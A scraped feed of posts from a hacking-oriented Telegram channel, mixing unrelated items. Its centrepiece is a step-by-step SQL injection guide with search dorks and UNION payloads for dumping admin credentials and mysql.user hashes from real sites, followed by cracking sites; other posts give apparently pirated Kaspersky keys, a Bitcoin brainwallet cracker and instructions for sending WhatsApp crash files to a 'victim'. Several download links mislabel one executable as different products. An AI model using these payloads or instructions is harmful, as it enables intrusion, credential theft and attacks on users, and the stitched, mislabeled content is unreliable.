UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.9K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘ ๐–‡๐–Š๐–˜๐–™ ๐–•๐–‰๐–‹ ๐–Š๐–‰๐–Ž๐–™๐–”๐–— ๐–†๐–•๐–•๐–˜ ๐–‹๐–”๐–— ๐–œ๐–Ž๐–“๐–‰๐–”๐–œ๐–˜, ๐–’๐–†๐–ˆ & ๐–‘๐–Ž๐–“๐–š๐– &
(instagram.com/UnderCodetestingCompany)

๐Ÿฆ‘
1) Sejda (Web, Windows, Mac, Linux) to edit text and create PDF forms for free

>https://www.sejda.com/pdf-editor

2) Xodo (Web, Android, iOS, Windows) to annotate and collaborate on PDFs anywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe

3) CloudConvert (Web) to turn PDF files into editable Word documents

>https://zapier.com/blog/best-pdf-editor-apps/


4) Foxit (Web, Android, iOS, Windows, Mac) to edit PDFs everywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe


5) Preview (Mac) to rearrange pages, sign documents, and mark up PDFs for free

> https://support.apple.com/en-us/HT201740?utm_source=zapier.com&utm_medium=referral&utm_campaign=zapier

6) PDF Expert (iOS, Mac) to quickly edit PDF text and images

>http://download.wondershare.net/pdfelement-pro_full5261.exe

7) PDFelement (Android, iOS,Windows, Mac) to edit PDFs and add forms in an Office-like editor

>http://download.wondershare.net/pdfelement-pro_full5261.exe

8) Adobe Acrobat (Windows, Mac) to create detailed PDFs and forms

>http://download.wondershare.net/pdfelement-pro_full5261.exe

ลดแ–‡๏ผฉแต—แต—ั”๏ฝŽ แต‡ะŽ ๐“‚ล˜. ๐”Ÿแต’ลฆ๐งแต‰ั‚ (๐“ฃ.โ“‚๏ธ.)

โ– โ–‚ โ–„ โ–… ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–… โ–„ โ–‚ โ–[
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘โ„๐•’๐•”๐•œ ๐•จ๐•–๐•“๐•ค๐•š๐•ฅ๐•– ๐••๐•’๐•ฅ๐•’๐•“๐•’๐•ค๐•– ๐•˜๐•ฆ๐•š๐••๐•– ๐•“๐•ช ๐•Œ๐•Ÿ๐••๐•–๐•ฃโ„‚๐• ๐••๐•–:


๐Ÿฆ‘Website Database Like:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

๐Ÿฆ‘๐Ÿ„ป๐Ÿ„ด๐Ÿ…ƒ ๐Ÿ…‚ ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ…๐Ÿ…ƒ:


1) Finding vulnerable websites:
Can get alot google search or get many from deepweb & Google combine

> github.com/UnderCodeTestingC/Vulnerables-Sites

2) Examples sites: (sql)

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

3)Checking for Vulnerability on the website

EXAMPLE:

> h**p://www.site.com/products.php?id=7


๐Ÿฆ‘To test this URL, we add a quote to it โ€˜

> h**p://www.site.com/products.php?id=7โ€™


4) On executing it, if we get an error like this: โ€œYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etcโ€ฆโ€Or something like that,

> that means the target website is vulnerable to sql injection and you can hack it.

5) Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

> h**p://www.site.com/products.php?id=5 order by 1/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 2/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 3/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 4/* โ€“> Error (we get message like this Unknown column โ€˜4โ€™ in โ€˜order clauseโ€™ or something like that)

that means that the it has 3 columns, cause we got an error on.

7) Check for UNION function

With union we can select more data in one sql statement.

So in same example site:

> h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )

>!if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

8) Check MySQL version


h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try โ€”
itโ€™s a comment and itโ€™s important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error โ€œunion + illegal mix of collations (IMPLICIT + COERCIBLE) โ€ฆโ€

I didnโ€™t see any paper covering this problem, so i must write it .
What we need is convert() function
i.e.
h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

h**p://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


9) Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12โ€ฆ) <โ€” later i will describe for MySQL greater than 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s โ€ฆ

10) common column names are: username, user, usr, user_name, password, pass, passwd, pwd etcโ€ฆ
i.e would be

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and thatโ€™s good )

table admin existsโ€ฆ

11) Now to check column names.

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etcโ€ฆ

12) now to check if column password exists

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1โ€ฆ
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*


>t.me/UnderCodeTestingOfficial

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

13) Now we get displayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If canโ€™t guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*


14) To get tables we use table_name and information_schema.tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

15) Here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*


16) note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1

i.e

๐Ÿฆ‘
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

17) Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etcโ€ฆ

To get the column names the method is the same.

Here we use column_name and information_schema.columns


18 ) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


19) Crack the password with the help of a site:
Download::

http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php

> DONT COPY OUR TuTorial ๐ŸŒš

๐“ฆ๐“ป๐“ฒ๐“ฝ๐“ฝ๐“ฎ๐“ท ๐“ซ๐”‚ ๐“œ๐“ป. ๐“‘๐“ธ๐“ฝ๐“๐“ฎ๐“ฝ (๐“ฝ.๐“ถ.)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
โ˜…FULL GUIDE 19 STEPS HACK ANY WEBSITE SQL FOR NEWBIES & EXPERTSโ˜…
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘๐”ป๐• ๐•”๐•œ๐•–๐•ฃ๐•”๐•ฃ๐•’๐•—๐•ฅ ๐”ฝ๐• ๐•ฃ ๐”ธ๐•Ÿ๐•ช ๐•ƒ๐•š๐•Ÿ๐•ฆ๐•ฉ ๐”ป๐•š๐•ค๐•ฅ๐•ฃ๐•  ๐•†๐•Ÿ๐•– ๐•†๐•— ๐”พ๐•š๐•ฅ๐•™๐•ฆ๐•“ ๐•‹๐• ๐•ก๐•š๐•” ๐•จ๐•š๐•ฅ๐•™ ๐Ÿ๐•œ ๐•ค๐•ฅ๐•’๐•ฃ๐•ค:
+ Free Minecraft Docker client On Their Servers , to visualize and manage Docker containers:
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘๐™„๐™‰๐™Ž๐™๐˜ผ๐™‡๐™‡๐™„๐™Ž๐˜ผ๐™๐™„๐™Š๐™‰ & ๐™๐™๐™‰ :

1) You can Download Minecraft from here :
>https://minecraft.net/

Or Simply Type in Terminal

> git clone git@github.com:docker/dockercraft.git

2) docker build -t gaetan/dockercraft dockercraft

3) docker run -t -i -d -p 25565:25565 \

4) -v /var/run/docker.sock:/var/run/docker.sock \

5) --name dockercraft \

6) gaetan/dockercraft

7) Mounting /var/run/docker.sock inside the container is necessary to send requests to the Docker remote API.

8) Open Minecraft > Multiplayer > Add Server

> The server address is the IP of Docker host. No need to specify a port if you used the default one.

>If you're using Docker Machine: docker-machine ip <machine_name>

9) Join Server!

><You should see at least one container in your world, which is the one hosting your Dockercraft server.

>You can start, stop and remove containers interacting with levers and buttons. Some Docker commands are also supported directly via Minecraft's chat window, which is displayed by pressing the T key (default) or / key.

10) A command always starts with a /.

> If you open the prompt using the / key, it will be prefilled with a / character, but if you open it with the T key, it will not be prefilled and you will have to type a / yourself before typing your docker command.

example: /docker run redis

๐Ÿฆ‘๐˜พ๐™ช๐™จ๐™ฉ๐™ค๐™ข๐™ž๐™ฏ๐™ž๐™ฃ๐™œ ๐˜ฟ๐™ค๐™˜๐™ ๐™š๐™ง๐™˜๐™ง๐™–๐™›๐™ฉ:

11) You can pass these additional arguments to your docker run command:

> docker run -t -i -d -p 25565:25565 \

> -v /var/run/docker.sock:/var/run/docker.sock \

> --name dockercraf

>gaetan/dockercraft <biome> <groundlevel> <sealevel> <finishers>

๐Ÿฆ‘๐”พ๐• ๐•ก๐•ฃ๐• ๐•ฉ๐•ช:

12) Events from the Docker remote API are transmitted to the Lua plugin by a small daemon (written in Go). (go/src/goproxy)

> func MCServerRequest(data url.Values, client *http.Client) {
req, _ := http.NewRequest("POST", "http://127.0.0.1:8080/webadmin/Docker/Docker", strings.NewReader(data.Encode()))
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.SetBasicAuth("admin", "admin")
client.Do(req)

๐“ฆ๐“ป๐“ฒ๐“ฝ๐“ฝ๐“ฎ๐“ท ๐“ซ๐”‚ ๐“œ๐“ป. ๐“‘๐“ธ๐“ฝ๐“๐“ฎ๐“ฝ (๐“ฝ.๐“ถ.)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - -- Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘KASPERY ANTIVIRUS WORKING & TESTED KEYS :
(Instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘Kaspersky Key ( Free 91 days )

You can download Kaspersky free antivirus from here : https://www.kaspersky.com/free-antivirus

Kaspersky Internet Security ( KIS 91 ) Days OEM Trial Keys:

4CH4C-PPFDT-NFK4B-45R69
WN2CH-P55VX-B53EK-UY222
NQJMW-GBXCX-HSJZ3-Z2ZQS
783RV-DQRXR-XXVM9-93HKM ( for Mac )
Kaspersky Anti-Virus ( KAV ) 91 Days OEM Trial Key:

JHJ7C-C69PX-MQY3J-PKG5B
D36NR-H27XY-5MVEQ-6WUFX
QTZJM-3EA1P-VNFSV-HPWFX
52MFR-XMPS3-RPXBM-K6T5E
Kaspersky Total Security 91 Days OEM Trial Key:

B3DFM-Q3KGA-UP7WG-X5SQ6
VYRVR-YHE4C-QQXMK-PVYJE ( for Android )
Kaspersky Interner Security for Android 90 days :

BYK9U-EHE8S-J1WY8-SG1CN
JAPXZ-9G9EJ-CSUV2-7YQUS
Kaspersky Small Office Security for 91 days

BJT18-15VFY-DTQ7C-U2NBS
VACVK-SJ4E4-9GN3T-WCJD8
BJSYM-2YX3V-1RV9S-UHVYM
YGXVQ-1VF6D-6B7EZ-G5SK7
4CH4C-PPFDT-NFK4B-45R69
BYK9U-EHE8S-J1WY8-SG1CN
AKHW5-HRNA6-FKVD9-QYW8C
Kaspersky Endpoint Security Cloud key

K1NTV-17WAH-PE1E3-M1ADX
Kaspersky Password Manager key

78M7R-AB67E-PURTM-5633K
Update new keys 03-28-19

CWKSR-FUCYQ-8FE41-V5942 (Proxy 54.79.3.202:9000 Australia)

S7KDA-JR326-JMVR5-Z7ZZ4 (49.248.153.94:8080 India)

XVJ2V-8NNKG-AFCPU-GUMQ6 (Proxy 46.101.135.107:3128 Germany)

9BXHK-N334Y-13N1D-1EUUB (185.185.172.250:8080 Iraq)

CFWQN-BDW85-6YNXM-9JR6Z (2.237.245.230:3128 Italy)

@ ๐“œ๐“ป. ๐“‘๐“ธ๐“ฝ๐“๐“ฎ๐“ฝ (๐“ฝ.๐“ถ.)

- - - -- Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘*Best Social-Engineer Toolkit (SET)*
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘*Installisation & Run:*

1) git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

2) cd set

3) pip install -r requirements.txt

๐Ÿฆ‘ *Tested by UnderCode on:*

1) Linux

2) Mac OS X (experimental)

๐Ÿฆ‘
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed In Same Repo

๐Ÿฆ‘Vid Tutorial https://youtu.be/uBrD0zYETTI

@ฬฝอ“ ฬฝอ“Mฬฝอ“rฬฝอ“ ฬฝอ“Bฬฝอ“oฬฝอ“tฬฝอ“Nฬฝอ“eฬฝอ“tฬฝอ“(t.m)
โ€”โ€”โ€”โ€”โ€”-๐•ฆ๐•Ÿ๐••๐•–๐•ฃ๐•”๐•†๐••๐•–โ€”โ€”โ€”โ€”
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
๐Ÿฆ‘*New Bitcoin Hacking Script*:
(Twitter.com/UnderCodeTC)

๐Ÿฆ‘Multi Function Brainwallet Cracker / MFBC:

*Installisation & Run:*

On Any Linux Distro

1) git https://github.com/mobb111/mfbc-master.git

2) cd mfbc-master

3) python3.7 mfbc.py

4) python3.7 bruter.py multiprocess

5) python3.7 mfbb.py mutiprocess dict attack

6) Select from function 1 to 4, 0 = Exit

๐Ÿฆ‘*Menu*:


1) os.urandom generator

2) secrets.token_bytes gen.

3) dict. attack rand. word gen.(no space)

4) dict. attack random word gen.(with space)

0) exit

@ฬถฬ ฬธฬ› ฬฬนMฬถฬ†rฬตฬ‡.ฬถฬ อ›อ ฬดฬBฬตฬ… ฬนoฬตอ’tฬท ฬ›อ‘nฬถฬ ฬอ“eฬดอ‘tฬดฬŽ อŒฬ (ฬตอ’tฬด อ’ฬฝ.ฬธอ„mฬถฬ’ ฬ‘อ–.ฬทฬ‘

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘We recently uplod new crashcodes for whatsapp for all versions on our repo

HOW TO CRASH WHATSAPP?

>clone or download zip from https://github.com/UnderCodeTestingC/CrashCodes/
1) Upload it to iCloud Drive, Dropbox etc.. (just if you want to keep it)

2) Share the file to send it via Message

3) Send it to your victim

4) Wait for the victim to open whatsapp, the Message application freeze and donโ€™t work anymore

๐Ÿฆ‘๐”ฝ๐• ๐•ฃ ๐”ผ๐•ฉ๐•’๐•ž๐•ก๐•๐•– ๐•Š๐”ผ๐”ผ ๐•‹โ„๐•€๐•Š ๐•๐•†๐•Œ๐•‹๐•Œ๐”น๐”ผ:
https://youtu.be/X3uGa0Qddtk

@ฬถฬ ฬธฬ› ฬฬนMฬถฬ†rฬตฬ‡.ฬถฬ อ›อ ฬดฬBฬตฬ… ฬนoฬตอ’tฬท ฬ›อ‘nฬถฬ ฬอ“eฬดอ‘tฬดฬŽ อŒฬ (ฬตอ’tฬด อ’ฬฝ.ฬธอ„mฬถฬ’ ฬ‘อ–.ฬทฬ‘
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘Harry up we up i choose to upload big collection of Vulnerables sites via sql injection on
>https://github.com/UnderCodeTestingC/VULNERABLES-Sites

@ฬถฬ ฬธฬ› ฬฬนMฬถฬ†rฬตฬ‡.ฬถฬ อ›อ ฬดฬBฬตฬ… ฬนoฬตอ’tฬท ฬ›อ‘nฬถฬ ฬอ“eฬดอ‘tฬดฬŽ อŒฬ (ฬตอ’tฬด อ’ฬฝ.ฬธอ„mฬถฬ’ ฬ‘อ–.ฬทฬ‘
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
Ransoware Detetction @UnderCodeTestingOfficial
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘Compiles a json dataset using public sources that contains properties to aid in the detection and mitigation of over 1000 variants of ransomware.
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘ ๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ:

1) https://github.com/codingo/Ransomware-Json-Dataset

2) Install Dependencies:

>pip install -r requirements.txt

3) Run Updater:

> python ./UpdateJsonDataset/update_json.py

๐Ÿฆ‘๐Ÿ„ฝ๐Ÿ„พ๐Ÿ…ƒ๐Ÿ„ด:

The latest version of the Ransomware Summary spreadsheet will then be downloaded and processed into a local json output which will be found in the core folder of your local repository along with a copy of the latest version of the spreadsheet. To change the source and destinations for local files edit the constants found in the header of the 'update_json.py' file.

@ ๐Ÿ…ผ๐Ÿ†. ๐Ÿ…ฑ๏ธ๐Ÿ…พ๏ธ๐Ÿ†ƒ๐Ÿ…ฝ๐Ÿ…ด๐Ÿ†ƒ (๐Ÿ†ƒ.๐Ÿ…ผ.)
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
UNDERCODE BY RED TEAM FULL PDFโ˜ ๏ธ.pdf
9 MB
masterbitcoin UNDERCODE.pdf
7.9 MB
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘How To Boost Up Game Performance In Your Android:
t.me/UnderCodeTestingOfficial)

1) Update Your Android Smartphone

>Android also has few bugs which lead to performance degradation. However, the good thing is that Android receives frequent updates consisting of bug fixes and security patches. These updates often provide stability to the Android leading to better performance

2) Turn Off Background Services

>our Android smartphones also runs lots of process and apps on the background. Usually, these background services do nothing apart from just consuming the CPU and RAM resources

3) Use Lite Apps

>As we all know, smartphones having better storage technology performs better when it comes to gaming. However, storage like UFS 2.1 is now seen only on high-end devices. These type of storage provides better read and write speed which leads to better gaming performance. However, not everyone has a capable smartphone, so, they need to manage the storage. You can easily save some extra storage by installing the Lite version of Popular apps. Apps like Facebook Lite, Messenger Lite, Twitter Lite, YouTube Go, provides the same features, but they need less space to install.

๐Ÿฆ‘ ๐Ÿ…„๐Ÿ…‚๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ„ถ ๐Ÿ„ถ๐Ÿ„ป ๐Ÿ…ƒ๐Ÿ„พ๐Ÿ„พ๐Ÿ„ป:

Step 1. First of all, you need a rooted Android and if you donโ€™t have that you can refer our quick guide sended before in undercode to easily root android mobile.

Step 2. Now after rooting your android mobile, you will need an Android app that is GlTools (Graphic Optimizer) the Android app that boosts graphics performance of your mobile.

Step 3. Now once you installed this app launch it and this app will ask you the superuser access, grant it that will help this app to write and control system settings to get the better performance from them.

Step 4. Now you need to add a little plugin to make this app work, and for that, you can select TEX(DE)coder there.

Step 5. Now it will start getting the, and after that, you just need to agree to the terms and then simply install the downloaded plugin, and now your device will get rebooted to make this app proper changes.

Step 6. Now after reboot launch the app and you will see all the apps that being installed in your android mobile and you need to select the app that performance you want to boost up, you can choose any of the game.

Step 7. Now you will see lots of option, and you just need to set them according to your wish, and you can also set them as displayed in below screenshot and this will fool your device and brings you the better performance. You can also alter the GPU Name/Emulation and many other settings.

๐Ÿฆ‘Thatโ€™s it! You are done, now try to run the game, and you will feel the difference you have made.

@ ๐Ÿ…ผ๐Ÿ†. ๐Ÿ…ฑ๏ธ๐Ÿ…พ๏ธ๐Ÿ†ƒ๐Ÿ…ฝ๐Ÿ…ด๐Ÿ†ƒ (๐Ÿ†ƒ.๐Ÿ…ผ.)
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘HOW SPEED UP ANDROID SPECIAL FOR HACKING & PROCESSING & Gaming BY UnderCode:
(Facebook.com/UnderCodeTestingCompanie)

Uส‚ษ› ฦกลณเฝž ษฌลณษฌฦกเฝžฤฑฤ…ฦ– ส‚ษ›ล‹ษ–ษ›ษ– แƒชษ›ส„ฦกเฝžษ› ฤ…ล‹ษ– :
๐Ÿฆ‘ Using Android Developer Option:

>Android comes pre-loaded with many features. There is an option of Force 4x MSAA in Android developer options which needed to be enabled. Let me tell you MSAA stands for multi-sample anti-aliasing.

Step 1. First of all, you need to enable the Developer option. For that simply open the Settings screen and then under About phone option you need to tap on โ€œBuild Numberโ€ 4-5 times. You will see the developer option.

Step 2. Now open the developer option.

Step 3. Now you need to find the option โ€œTurn on 4x MSAAโ€. You need to enable it.

Thatโ€™s it! You are done. Now open up any game, and it will run smoothly. However, this feature drains your battery life. Things might vary on different apps and devices.

๐Ÿฆ‘Turn Off Animations:
Well, Animations are important because it provides a better Android experience. If you have a less capable smartphone, then you need to turn off the animations to achieve better gaming performance. To turn off animations on Android smartphone

> open Settings and then select โ€˜Developer Optionsโ€™. Now on the Developer options, search for the โ€˜Drawingโ€™ option. There you need to modify the three options โ€“ Window Animation Scale, Transition animation scale, Animator duration scale. Set all those to โ€“ 0.5x

๐Ÿฆ‘Expanding the RAM of your Android smartphone
Well, as we know we can tweak our Android devices. Similarly, we can also expand our Androidโ€™s RAM and by increasing the RAM of our smartphone we can automatically achieve greater speed while playing games. To expand RAM on your Android smartphone, follow this tutorial

Step 1. To start, you need to download and install Roehsoft Ram Expander on your Android smartphone. However, you need to have a rooted Android smartphone to use this app. If you are looking for a rooting guide, this article might help you.

Step 2. Now install the app and grant the superuser permission.



Step 3. Now you will get to see few options like SDCard Memory, Total Free RAM etc. There you need to set the new size for your swapfile.



Step 4. Now you need to swipe over โ€˜Swap/Activeโ€™ and wait for a moment until the swap is executed fully.



Step 5. In the next step, you need to select the path or partition for the swap file. you need to select your SD card.



Step 6. Press the back button and then on the main page, you need to swipe over โ€˜Swap/Activeโ€™ and wait for few seconds.

Thatโ€™s it, you are done! This is how you can use Roehsoft to increase your Android RAM. Increasing your Androidโ€™s RAM will probably boost the gaming performance and Speed Up Processing In Hacks....

@ ๐Ÿ…ผ๐Ÿ†. ๐Ÿ…ฑ๏ธ๐Ÿ…พ๏ธ๐Ÿ†ƒ๐Ÿ…ฝ๐Ÿ…ด๐Ÿ†ƒ (๐Ÿ†ƒ.๐Ÿ…ผ.)
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘๐Ÿ…†๐Ÿ„ฟ๐Ÿ„ฐ3 ๐Ÿ…‚๐Ÿ„ด๐Ÿ„ฒ๐Ÿ…„๐Ÿ…๐Ÿ„ธ๐Ÿ…ƒ๐Ÿ…ˆ ๐Ÿ„ธ๐Ÿ„ผ๐Ÿ„ฟ๐Ÿ…๐Ÿ„พ๐Ÿ……๐Ÿ„ด๐Ÿ„ผ๐Ÿ„ด๐Ÿ„ฝ๐Ÿ…ƒ๐Ÿ…‚:
(instagram.com/UnderCodeTestingCompany):

๐Ÿฆ‘Keeping up with the security industry (well IT in general to be honest) is a challenging task to say the least. I like to think I do a relatively good job, but every once in a while you realise something has managed to completely pass you by! This happened recently to me when a colleague mentioned in passing that โ€œ802.11ax supports encryption on open SSIDsโ€. After having a look into it this isnโ€™t strictly speaking true, the capability is actually provided by the new WPA3 standard, but I was left wondering how on earth I missed this. This post will have a look at some of the security improvements WPA3 brings over its predecessor โ€“ WPA2.
The problems with WPA2

๐Ÿฆ‘The current security standard for wireless networks (WPA2) comes in two flavours โ€“ personal (pre-shared-key) and enterprise (RADIUS based EAP/802.1x). Additionally SSIDs can be left in an โ€œopenโ€ mode which offers no protection and is typically used for guest/hotspot access.

๐Ÿฆ‘Open SSIDs clearly offer no protection to the users of the network. This has meant that guest access such as that seen in enterprises and coffee shops/hotels up and down the country offers no privacy and allows for easy man in the middle attacks. This is one of the reasons that TLS (more specifically HSTS) is so vitally important for end-user security. But the better option of course would be to have the data encrypted over the air.

๐Ÿฆ‘Ok so what about using a pre-shared-key then? Wellโ€ฆ thatโ€™s not much better either. Anyone within range of the radio signals who also has the key can snoop on the communications (assuming they capture the relevant handshake process). An improvement (it keeps those without the key at bay) but not great from a privacy/security perspective. Pre-shared keys were also easily susceptible to offline brute force attacks.

๐Ÿฆ‘WPA2-Enterprise must be the answer then! Well yes, it is by far the best from a security perspective, but even that has had its fair share of issues. Often enterprises rely on staff usernames/passwords (and we know that humans tend to be bad when it comes to passwords) and there was a weakness discovered in the protocol that allows for an attack known as Key Reinstallation AttaCKs (KRACK). This attack worked against all modern wireless networks and could allow an attacker to read information that had been previously encrypted.
Enter WPA3

๐Ÿฆ‘WPA3 has been redesigned to address a bunch of the issues with WPA2. That being said, recently discovered vulnerabilities in the standard have brought into question how well the protocol works โ€“ more on that here.

๐Ÿฆ‘Putting that to the side for one moment, lets have a look at some of the improvements that WPA3 brings over WPA2.
Open SSID encryption

๐Ÿฆ‘Yes, yes yes! A major improvement over WPA2. WPA3 allows for something now as Opportunistic Wireless Encryption (OWE) or as its known in WPA3 โ€“ โ€œEnhanced Openโ€. This means that your typical hotspot wireless found in hotel, pubs, shopping centres and enterprises up and down the country can now provide privacy and security. It also offers management frame protection to help protect against the disassociation attacks typically seen to cause clients to re-perform their initial handshake.

๐Ÿฆ‘Without going into too much detail, the process relies on Diffie-Hellman key-exchange to be able to generate unique keying material per device. Even better, it is transparent to the end-user. No more mistyped pre-shared keys or difficulty connecting to networks.

๐Ÿฆ‘As far as I can tell from what Iโ€™ve read, OWE is not an official part of the WPA3 standard. Its implementation in wireless solutions is not mandatory and vendors can choose to implement it or not โ€“ here is to hoping they do.
Simultaneous Authentication of Equals (SAE)
๐Ÿฆ‘Simul-what? Issues with WPA2โ€™s handshake process means that attackers could easily capture handshake data and crack it offline without interaction with the wireless access point. Bad news for those with weak pre-shared-keys.

๐Ÿฆ‘Without getting into the details, SAE essentially means that this offline attack vector wonโ€™t be possible. In order to crack a pre-shared-key, an attacker would have to interact with the wireless access point which will drastically slow down the brute force process and/or allow for client blacklisting.

๐Ÿฆ‘Unfortunately this SAE process seems to be at the centre of the recent weaknesses in WPA3, so maybe it isnโ€™t quite all its cracked up to be.
Perfect Forward Secrecy (PFS)

๐Ÿฆ‘๐Ÿฆ‘What if SAE didnโ€™t slow down the attacker enough and they are successful in guessing the key? Well, youโ€™re probably not in for a good day and no doubt wondering why you thought โ€œWir3l3ss2019โ€ would make a secure key! That being said, one slight upside is that the attacker canโ€™t decrypt traffic that they may have previously captured. Much like ECDHE ciphers with TLS, WPA3 provides perfect forward secrecy.
Stronger encryption

